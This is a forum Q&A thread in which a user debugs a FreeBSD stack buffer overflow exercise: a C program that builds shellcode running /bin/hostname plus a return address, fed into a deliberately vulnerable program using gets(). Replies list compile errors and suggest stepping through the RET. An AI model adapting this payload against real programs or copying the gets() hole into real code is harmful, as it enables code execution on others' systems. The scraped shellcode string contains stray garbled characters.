Buffer Overflow-Not getting the Correct output

the Shell code print the hostname(bin/hostname). but when i execute the code its shows me the the path in reverse order but not printing the HOSTNAME. I am actually doing the buffer over flow . I am using freebsd intel machine. this is my code

can you figure out please where is the error

//Prog 1
    #include<stdio.h>
    main()
    {
    char shellcode[]= “\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62
       \x69\x6e\x2f\x68\x2f\x2f\x开发者_运维问答2f\x2f\x89\xe3\x50\x54\x53\xb0\x3b
               \x50\xcd\x80”;
     int i;
     char buf[108];
     i=strlen(shellcode); 
     printf(“%d”,i);
     strcpy(buf,shellcode);
     for(i=36;i<104:i++)
     {
      buf[i]='b';
     }
     buf[104]='\x2c';
     buf[105]='\xfa';
     buf[106]='\xbf';
     buf[107]='\xbf';

     printf(“%s”,buf);
         return 0;
    }   

The Above program is injected into below program ...... so it creates the bufferover flow and print the hostname

#include <stdio.h>
int 
main (int argc, char **argv){
    char buf[100];
    printf("Please Enter your Name");   
        fflush(stdout);
    gets(buf);
    printf("Hello  %s \n",buf);
}
void notcalled(void){
//puts("cccc");
}

1. you are defining int I; and using i
2. the for is using a :i++, instead of a ;i++
3. strncpy() is missing the size_t param too

There is no buffer overflow in this sample code. You are simply printing the shell code, instead of executing it.

The code as posted doesn't even compile, due to things like quotes, i vs I problem, : instead of ; and strncpy needing 3 arguments (possibly more errors).

The shell code may be correct for freebsd, I can't check that. It definitely isn't correct for linux, though.

Apparently you are still not triggering code execution, even though now I see where you have your buffer overflow. Note however that overflowing the buf variable is trying to overwrite the return address for main, so it should print the text in any case. Also, the compiler may have generated a different stack layout than what you expect, or maybe your stack is not executable (although you should get a segfault in this case).

Use a debugger to single step through the code, beginning with the "return" statement in main and see what is happening. You will soon reach a RET instruction which should pop the starting address of your shellcode into the instruction pointer, effectively jumping to it. I suspect that is not happening for some reason.